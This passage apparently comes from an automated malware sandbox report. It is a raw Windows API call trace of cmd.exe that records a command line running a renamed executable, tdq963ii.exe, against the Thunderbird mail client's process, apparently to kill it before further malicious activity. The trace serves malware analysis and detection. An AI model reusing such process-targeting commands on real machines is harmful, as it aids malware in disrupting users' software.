(in: hHeap=0x390000, dwFlags=0x0, lpMem=0x390de8 | out: hHeap=0x390000) returned 1 [0237.853] GetProcessHeap () returned 0x390000 [0237.853] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3912a0 | out: hHeap=0x390000) returned 1 [0237.853] GetProcessHeap () returned 0x390000 [0237.854] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x390e00 | out: hHeap=0x390000) returned 1 [0237.854] GetProcessHeap () returned 0x390000 [0237.854] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a43c8 | out: hHeap=0x390000) returned 1 [0237.854] GetProcessHeap () returned 0x390000 [0237.854] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4368 | out: hHeap=0x390000) returned 1 [0237.854] GetProcessHeap () returned 0x390000 [0237.854] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4338 | out: hHeap=0x390000) returned 1 [0237.854] GetProcessHeap () returned 0x390000 [0237.854] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a42d8 | out: hHeap=0x390000) returned 1 [0237.854] GetProcessHeap () returned 0x390000 [0237.854] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4278 | out: hHeap=0x390000) returned 1 [0237.854] GetProcessHeap () returned 0x390000 [0237.854] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a41f8 | out: hHeap=0x390000) returned 1 [0237.854] GetProcessHeap () returned 0x390000 [0237.854] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a41a0 | out: hHeap=0x390000) returned 1 [0237.854] GetProcessHeap () returned 0x390000 [0237.854] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x391280 | out: hHeap=0x390000) returned 1 [0237.854] GetProcessHeap () returned 0x390000 [0237.854] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x391230 | out: hHeap=0x390000) returned 1 [0237.854] GetProcessHeap () returned 0x390000 [0237.854] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3911d0 | out: hHeap=0x390000) returned 1 [0237.854] _get_osfhandle (_FileHandle=3) returned 0x74 [0237.854] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0237.854] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2ef1a8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2ef1a8*=0x0, lpOverlapped=0x0) returned 1 [0237.855] GetLastError () returned 0x0 [0237.855] _get_osfhandle (_FileHandle=3) returned 0x74 [0237.855] GetFileType (hFile=0x74) returned 0x1 [0237.855] _get_osfhandle (_FileHandle=3) returned 0x74 [0237.855] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0237.855] GetProcessHeap () returned 0x390000 [0237.855] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x400a) returned 0x3b4bc8 [0237.855] GetProcessHeap () returned 0x390000 [0237.855] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3b4bc8 | out: hHeap=0x390000) returned 1 [0237.856] _get_osfhandle (_FileHandle=3) returned 0x74 [0237.856] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0237.856] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2ef18c, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2ef18c*=0x0, lpOverlapped=0x0) returned 1 [0237.856] GetLastError () returned 0x0 [0237.856] _get_osfhandle (_FileHandle=3) returned 0x74 [0237.856] GetFileType (hFile=0x74) returned 0x1 [0237.856] _get_osfhandle (_FileHandle=3) returned 0x74 [0237.856] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0237.856] GetProcessHeap () returned 0x390000 [0237.856] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x400a) returned 0x3b4bc8 [0237.856] GetProcessHeap () returned 0x390000 [0237.856] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3b4bc8 | out: hHeap=0x390000) returned 1 [0237.856] longjmp () [0237.856] _tell (_FileHandle=3) returned 226 [0237.857] _close (_FileHandle=3) returned 0 [0237.857] CmdBatNotification () returned 0x1 [0237.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.857] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0237.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.857] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0237.858] _get_osfhandle (_FileHandle=0) returned 0x3 [0237.858] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0237.858] SetConsoleInputExeNameW () returned 0x1 [0237.858] GetConsoleOutputCP () returned 0x1b5 [0237.858] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0237.858] SetThreadUILanguage (LangId=0x0) returned 0x409 [0237.859] exit (_Code=1) Process: id = "202" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1ae76000" os_pid = "0xa2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "163" os_parent_pid = "0xa18" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"thunderbird.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 756 os_tid = 0xa90 [0203.466] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f7bc | out: lpSystemTimeAsFileTime=0x14f7bc*(dwLowDateTime=0x32412bc0, dwHighDateTime=0x1d68287)) [0203.466] GetCurrentProcessId () returned 0xa2c [0203.466] GetCurrentThreadId () returned 0xa90 [0203.466] GetTickCount () returned 0x115f326 [0203.466] QueryPerformanceCounter (in: lpPerformanceCount=0x14f7b4 | out: lpPerformanceCount=0x14f7b4*=32380601742) returned 1 [0203.469] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0203.469] __set_app_type (_Type=0x1) [0203.469] __p__fmode () returned 0x770331f4 [0203.469] __p__commode () returned 0x770331fc [0203.469] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0203.470] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0203.470] GetCurrentThreadId () returned 0xa90 [0203.470] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa90) returned 0x60 [0203.470] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0203.470] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0203.470] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.476] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0203.476] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f74c | out: phkResult=0x14f74c*=0x0) returned 0x2 [0203.477] VirtualQuery (in: lpAddress=0x14f783, lpBuffer=0x14f71c, dwLength=0x1c | out: lpBuffer=0x14f71c*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.477] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f71c, dwLength=0x1c | out: lpBuffer=0x14f71c*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0203.477] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f71c, dwLength=0x1c | out: lpBuffer=0x14f71c*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0203.477] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f71c, dwLength=0x1c | out: lpBuffer=0x14f71c*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.477] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f71c, dwLength=0x1c | out: lpBuffer=0x14f71c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0203.477] GetConsoleOutputCP () returned 0x1b5 [0203.495] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0203.495] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0203.495] _get_osfhandle (_FileHandle=1) returned 0x80 [0203.495] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0203.496] _get_osfhandle (_FileHandle=1) returned 0x80 [0203.496] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0203.496] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.496] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0203.497] GetEnvironmentStringsW () returned 0x5021e0* [0203.497] GetProcessHeap () returned 0x4f0000 [0203.497] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb86) returned 0x502d70 [0203.498] FreeEnvironmentStringsW (penv=0x5021e0) returned 1 [0203.498] GetProcessHeap () returned 0x4f0000 [0203.498] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4) returned 0x502060 [0203.498] GetEnvironmentStringsW () returned 0x5021e0* [0203.498] GetProcessHeap () returned 0x4f0000 [0203.498] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb86) returned 0x503900 [0203.498] FreeEnvironmentStringsW (penv=0x5021e0) returned 1 [0203.499] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e6bc | out: phkResult=0x14e6bc*=0x68) returned 0x0 [0203.499] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e6c4, lpData=0x14e6c8, lpcbData=0x14e6c0*=0x1000 | out: lpType=0x14e6c4*=0x0, lpData=0x14e6c8*=0x0, lpcbData=0x14e6c0*=0x1000) returned 0x2 [0203.499] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e6c4, lpData=0x14e6c8, lpcbData=0x14e6c0*=0x1000 | out: lpType=0x14e6c4*=0x4, lpData=0x14e6c8*=0x1, lpcbData=0x14e6c0*=0x4) returned 0x0 [0203.499] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e6c4, lpData=0x14e6c8, lpcbData=0x14e6c0*=0x1000 | out: lpType=0x14e6c4*=0x0, lpData=0x14e6c8*=0x1, lpcbData=0x14e6c0*=0x1000) returned 0x2 [0203.499] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e6c4, lpData=0x14e6c8, lpcbData=0x14e6c0*=0x1000 | out: lpType=0x14e6c4*=0x4, lpData=0x14e6c8*=0x0, lpcbData=0x14e6c0*=0x4) returned 0x0 [0203.499] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e6c4, lpData=0x14e6c8, lpcbData=0x14e6c0*=0x1000 | out: lpType=0x14e6c4*=0x4, lpData=0x14e6c8*=0x40, lpcbData=0x14e6c0*=0x4) returned 0x0 [0203.499] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e6c4, lpData=0x14e6c8, lpcbData=0x14e6c0*=0x1000 | out: lpType=0x14e6c4*=0x4, lpData=0x14e6c8*=0x40, lpcbData=0x14e6c0*=0x4) returned 0x0 [0203.499] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e6c4, lpData=0x14e6c8, lpcbData=0x14e6c0*=0x1000 | out: lpType=0x14e6c4*=0x0, lpData=0x14e6c8*=0x40, lpcbData=0x14e6c0*=0x1000) returned 0x2 [0203.499] RegCloseKey (hKey=0x68) returned 0x0 [0203.499] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e6bc | out: phkResult=0x14e6bc*=0x68) returned 0x0 [0203.499] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e6c4, lpData=0x14e6c8, lpcbData=0x14e6c0*=0x1000 | out: lpType=0x14e6c4*=0x0, lpData=0x14e6c8*=0x40, lpcbData=0x14e6c0*=0x1000) returned 0x2 [0203.500] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e6c4, lpData=0x14e6c8, lpcbData=0x14e6c0*=0x1000 | out: lpType=0x14e6c4*=0x4, lpData=0x14e6c8*=0x1, lpcbData=0x14e6c0*=0x4) returned 0x0 [0203.500] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e6c4, lpData=0x14e6c8, lpcbData=0x14e6c0*=0x1000 | out: lpType=0x14e6c4*=0x0, lpData=0x14e6c8*=0x1, lpcbData=0x14e6c0*=0x1000) returned 0x2 [0203.500] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e6c4, lpData=0x14e6c8, lpcbData=0x14e6c0*=0x1000 | out: lpType=0x14e6c4*=0x4, lpData=0x14e6c8*=0x0, lpcbData=0x14e6c0*=0x4) returned 0x0 [0203.500] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e6c4, lpData=0x14e6c8, lpcbData=0x14e6c0*=0x1000 | out: lpType=0x14e6c4*=0x4, lpData=0x14e6c8*=0x9, lpcbData=0x14e6c0*=0x4) returned 0x0 [0203.500] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e6c4, lpData=0x14e6c8, lpcbData=0x14e6c0*=0x1000 | out: lpType=0x14e6c4*=0x4, lpData=0x14e6c8*=0x9, lpcbData=0x14e6c0*=0x4) returned 0x0 [0203.500] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e6c4, lpData=0x14e6c8, lpcbData=0x14e6c0*=0x1000 | out: lpType=0x14e6c4*=0x0, lpData=0x14e6c8*=0x9, lpcbData=0x14e6c0*=0x1000) returned 0x2 [0203.500] RegCloseKey (hKey=0x68) returned 0x0 [0203.500] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2e6 [0203.501] srand (_Seed=0x5f51e2e6) [0203.501] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"thunderbird.exe\" -nobanner" [0203.501] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"thunderbird.exe\" -nobanner" [0203.501] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0203.502] GetProcessHeap () returned 0x4f0000 [0203.502] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x210) returned 0x504490 [0203.502] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x504498, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0203.503] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0203.503] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.503] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0203.503] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.503] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0203.503] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0203.503] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0203.503] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0203.503] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0203.503] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0203.503] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0203.503] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0203.503] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0203.503] GetProcessHeap () returned 0x4f0000 [0203.503] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x54) returned 0x5046a8 [0203.503] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f488 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0203.504] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x14f488, lpFilePart=0x14f484 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f484*="Desktop") returned 0x25 [0203.504] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0203.504] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f204 | out: lpFindFileData=0x14f204*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x502070 [0203.504] FindClose (in: hFindFile=0x502070 | out: hFindFile=0x502070) returned 1 [0203.504] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x14f204 | out: lpFindFileData=0x14f204*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x502070 [0203.504] FindClose (in: hFindFile=0x502070 | out: hFindFile=0x502070) returned 1 [0203.504] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0203.504] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x14f204 | out: lpFindFileData=0x14f204*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x502070 [0203.505] FindClose (in: hFindFile=0x502070 | out: hFindFile=0x502070) returned 1 [0203.505] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0203.505] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0203.505] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0203.505] GetProcessHeap () returned 0x4f0000 [0203.505] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x502d70 | out: hHeap=0x4f0000) returned 1 [0203.505] GetEnvironmentStringsW () returned 0x5021e0* [0203.505] GetProcessHeap () returned 0x4f0000 [0203.505] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb86) returned 0x502d70 [0203.505] FreeEnvironmentStringsW (penv=0x5021e0) returned 1 [0203.505] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0203.505] GetProcessHeap () returned 0x4f0000 [0203.505] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5046a8 | out: hHeap=0x4f0000) returned 1 [0203.505] GetProcessHeap () returned 0x4f0000 [0203.505] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400e) returned 0x504f08 [0203.506] GetProcessHeap () returned 0x4f0000 [0203.506] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x76) returned 0x508f38 [0203.506] GetProcessHeap () returned 0x4f0000 [0203.506] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504f08 | out: hHeap=0x4f0000) returned 1 [0203.506] GetConsoleOutputCP () returned 0x1b5 [0203.740] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0203.741] GetUserDefaultLCID () returned 0x409 [0203.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0203.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f5c8, cchData=128 | out: lpLCData="0") returned 2 [0203.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f5c8, cchData=128 | out: lpLCData="0") returned 2 [0203.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f5c8, cchData=128 | out: lpLCData="1") returned 2 [0203.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0203.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0203.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0203.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0203.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0203.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0203.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0203.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0203.742] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0203.742] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0203.742] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0203.743] GetProcessHeap () returned 0x4f0000 [0203.743] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x20c) returned 0x5021e0 [0203.743] GetConsoleTitleW (in: lpConsoleTitle=0x5021e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.743] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0203.743] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0203.744] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0203.744] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0203.745] GetProcessHeap () returned 0x4f0000 [0203.745] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400a) returned 0x504f08 [0203.745] GetProcessHeap () returned 0x4f0000 [0203.745] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504f08 | out: hHeap=0x4f0000) returned 1 [0203.746] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0203.746] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0203.746] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0203.746] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0203.746] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0203.747] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0203.747] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0203.747] GetProcessHeap () returned 0x4f0000 [0203.747] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x5046a8 [0203.747] GetProcessHeap () returned 0x4f0000 [0203.747] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x22) returned 0x5023f8 [0203.748] GetProcessHeap () returned 0x4f0000 [0203.748] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x5a) returned 0x502428 [0203.749] GetConsoleTitleW (in: lpConsoleTitle=0x14f2c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.750] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0203.750] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0203.750] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0203.750] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0203.750] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0203.750] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0203.750] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0203.750] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0203.750] _wcsicmp (_String1="tdq963ii.exe", 